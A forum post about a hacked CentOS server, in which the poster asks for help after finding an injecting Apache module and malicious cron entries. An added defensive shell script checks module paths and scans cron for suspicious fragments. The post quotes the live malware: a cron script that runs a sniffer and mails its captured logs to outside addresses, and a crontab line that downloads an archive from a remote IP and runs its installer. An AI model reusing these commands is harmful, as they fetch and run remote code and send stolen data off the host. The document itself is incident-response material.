Need advice on linux server being hacked
I'm currently trying to find out how one of our CentOS servers was compromised. We were experiencing malware on our sites. After searching, I finally found the malware injecting into the sites. As it was happening randomly, it was hard to detect. I followed help from an Unmask Parasites blog article.
This led me to search through each of the Apache modules and eventually found a module that was injecting the malware. It went under the name of mod_string_mime.so and was being loaded through /etc/httpd/conf.d/mailman.conf to avoid detection. Very frustrating. The module is now deleted and the mailman.conf file is back to normal.
Digging further, I installed and ran rkhunter. Upon running this, I found a warning for a suspect file in /etc/cron.daily/ called dnsquery. This is what the file looks like:
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail unul_catalin@yahoo.com -s "$(hostname -f)" < test
mail cata@catalinx.org -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
I've tried to delete this file, but it keeps coming back every minute. The owner and group are psaadm. I can't find how it's being created. I assume it's being generated through Plesk cron or something.
I also found this in the crontab, which doesn't look right:
* * * * * chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;
Any suggestions on how to proceed or locate the intrusion?
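The two places the post describes finding the intrusion are an Apache module loaded from an unexpected location via a conf.d file, and cron entries that fetch an archive, strip file attributes and mail log extracts off the host. The following POSIX shell script is an added example (not code from the original post or from any tool it mentions) that reviews both: it lists every LoadModule directive whose .so lives outside the standard module directory, and greps all cron sources, including /var/spool/cron where per-user crontabs such as psaadm's live, for command fragments that deserve a second look. The module directory, cron locations and the pattern list are assumptions for a default CentOS layout; adjust them for your host.

```shell
#!/bin/sh
# Added example, not part of the original post: review Apache LoadModule
# directives and cron sources for the kinds of indicators described above.
# Assumptions: the paths below are CentOS defaults; SUSPECT_RE is a
# constructed list of fragments worth reviewing, not a definitive signature.

EXPECTED_MODDIR=/usr/lib64/httpd/modules
CRON_SOURCES="/etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
/etc/cron.weekly /etc/cron.monthly /var/spool/cron"
# Fragments that appeared in the malicious entries: attribute stripping,
# downloads, archives, temp dirs, process killing, mailing files out.
SUSPECT_RE='chattr|wget|curl|/tmp/|\.tgz|killall|mail '

# find_foreign_modules CONF_DIR MODDIR
# Prints "file<TAB>module<TAB>path" for every LoadModule directive under
# CONF_DIR whose .so is not under MODDIR (or the ServerRoot-relative
# "modules/" prefix that stock httpd.conf uses).
find_foreign_modules() {
    conf_dir=$1
    moddir=$2
    grep -rHE '^[[:space:]]*LoadModule[[:space:]]' "$conf_dir" 2>/dev/null |
    while IFS=: read -r file rest; do
        # shellcheck disable=SC2086 -- intentional word split of the directive
        set -- $rest            # $1=LoadModule $2=module name $3=path
        case $3 in
            "$moddir"/*|modules/*) ;;   # loaded from where modules belong
            *) printf '%s\t%s\t%s\n' "$file" "$2" "$3" ;;
        esac
    done
}

# scan_cron PATH...
# Prints file:line:text for every cron entry or script line matching
# SUSPECT_RE. Missing paths are skipped; no match is not an error.
scan_cron() {
    for src in "$@"; do
        if [ -e "$src" ]; then
            grep -rnE "$SUSPECT_RE" "$src" 2>/dev/null || true
        fi
    done
    return 0
}

main() {
    echo "== LoadModule directives outside $EXPECTED_MODDIR =="
    find_foreign_modules /etc/httpd "$EXPECTED_MODDIR"
    echo "== cron entries matching: $SUSPECT_RE =="
    # shellcheck disable=SC2086 -- CRON_SOURCES is a space-separated list
    scan_cron $CRON_SOURCES
}

# Run the live review only when invoked as: sh review.sh --run
if [ "${1:-}" = "--run" ]; then main; fi
```

Run it as root so /var/spool/cron is readable. A module flagged by the first check still needs manual confirmation (check the package owning the .so with `rpm -qf`, and whether the conf file that loads it belongs to the package it claims to); the second check is a review list, not a verdict, and a hit on a legitimate backup script is expected. Because the post's file reappears every minute, the `* * * * *` entry in a user crontab is the first thing to look for in the second check's output.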